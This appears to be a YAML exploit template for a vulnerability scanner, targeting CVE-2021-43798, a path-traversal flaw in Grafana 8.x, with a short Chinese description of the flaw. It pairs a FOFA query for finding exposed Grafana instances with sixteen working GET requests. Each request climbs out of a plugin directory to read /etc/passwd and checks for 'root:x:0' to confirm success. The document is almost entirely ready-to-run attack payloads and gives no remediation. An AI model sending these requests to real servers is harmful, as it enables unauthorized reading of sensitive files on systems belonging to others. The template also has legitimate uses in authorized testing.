product: Grafana
vName: Grafana 插件模块目录穿越
type: 路径穿越
vID:
  - CVE-2021-43798
level: 2
vDesc: Grafana 是一个开源的度量分析与可视化套件。在 2021 年 12 月，推特用户@j0v 发表了他发现的一个 0day，攻击者利用这个漏洞可以读取服务器上的任意文件。
version: Grafana 8.x
note: ''
search:
  FOFA: app="Grafana"
protocol: http
link: https://github.com/Threekiii/Awesome-POC/blob/master/Web应用漏洞/Grafana 8.x 插件模块目录穿越漏洞 CVE-2021-43798.md
fix: [ ]
model: ''
logic: or
exploit:
  - exp:
      method: get
      follow: false
      path: /public/plugins/alertlist/../../../../../../../../../../../../../etc/passwd
    verify:
      path: ''
      logic: and
      check:
        - status: 200
          body:
            value:
              - 'root:x:0'
            logic: and
  - exp:
      method: get
      follow: false
      path: /public/plugins/cloudwatch/../../../../../../../../../../../../../etc/passwd
    verify:
      path: ''
      logic: and
      check:
        - status: 200
          body:
            value:
              - 'root:x:0'
            logic: and
  - exp:
      method: get
      follow: false
      path: /public/plugins/dashlist/../../../../../../../../../../../../../etc/passwd
    verify:
      path: ''
      logic: and
      check:
        - status: 200
          body:
            value:
              - 'root:x:0'
            logic: and
  - exp:
      method: get
      follow: false
      path: /public/plugins/elasticsearch/../../../../../../../../../../../../../etc/passwd
    verify:
      path: ''
      logic: and
      check:
        - status: 200
          body:
            value:
              - 'root:x:0'
            logic: and
  - exp:
      method: get
      follow: false
      path: /public/plugins/graph/../../../../../../../../../../../../../etc/passwd
    verify:
      path: ''
      logic: and
      check:
        - status: 200
          body:
            value:
              - 'root:x:0'
            logic: and
  - exp:
      method: get
      follow: false
      path: /public/plugins/graphite/../../../../../../../../../../../../../etc/passwd
    verify:
      path: ''
      logic: and
      check:
        - status: 200
          body:
            value:
              - 'root:x:0'
            logic: and
  - exp:
      method: get
      follow: false
      path: /public/plugins/heatmap/../../../../../../../../../../../../../etc/passwd
    verify:
      path: ''
      logic: and
      check:
        - status: 200
          body:
            value:
              - 'root:x:0'
            logic: and
  - exp:
      method: get
      follow: false
      path: /public/plugins/influxdb/../../../../../../../../../../../../../etc/passwd
    verify:
      path: ''
      logic: and
      check:
        - status: 200
          body:
            value:
              - 'root:x:0'
            logic: and
  - exp:
      method: get
      follow: false
      path: /public/plugins/mysql/../../../../../../../../../../../../../etc/passwd
    verify:
      path: ''
      logic: and
      check:
        - status: 200
          body:
            value:
              - 'root:x:0'
            logic: and
  - exp:
      method: get
      follow: false
      path: /public/plugins/opentsdb/../../../../../../../../../../../../../etc/passwd
    verify:
      path: ''
      logic: and
      check:
        - status: 200
          body:
            value:
              - 'root:x:0'
            logic: and
  - exp:
      method: get
      follow: false
      path: /public/plugins/pluginlist/../../../../../../../../../../../../../etc/passwd
    verify:
      path: ''
      logic: and
      check:
        - status: 200
          body:
            value:
              - 'root:x:0'
            logic: and
  - exp:
      method: get
      follow: false
      path: /public/plugins/postgres/../../../../../../../../../../../../../etc/passwd
    verify:
      path: ''
      logic: and
      check:
        - status: 200
          body:
            value:
              - 'root:x:0'
            logic: and
  - exp:
      method: get
      follow: false
      path: /public/plugins/prometheus/../../../../../../../../../../../../../etc/passwd
    verify:
      path: ''
      logic: and
      check:
        - status: 200
          body:
            value:
              - 'root:x:0'
            logic: and
  - exp:
      method: get
      follow: false
      path: /public/plugins/stackdriver/../../../../../../../../../../../../../etc/passwd
    verify:
      path: ''
      logic: and
      check:
        - status: 200
          body:
            value:
              - 'root:x:0'
            logic: and
  - exp:
      method: get
      follow: false
      path: /public/plugins/table/../../../../../../../../../../../../../etc/passwd
    verify:
      path: ''
      logic: and
      check:
        - status: 200
          body:
            value:
              - 'root:x:0'
            logic: and
  - exp:
      method: get
      follow: false
      path: /public/plugins/text/../../../../../../../../../../../../../etc/passwd
    verify:
      path: ''
      logic: and
      check:
        - status: 200
          body:
            value:
              - 'root:x:0'
            logic: and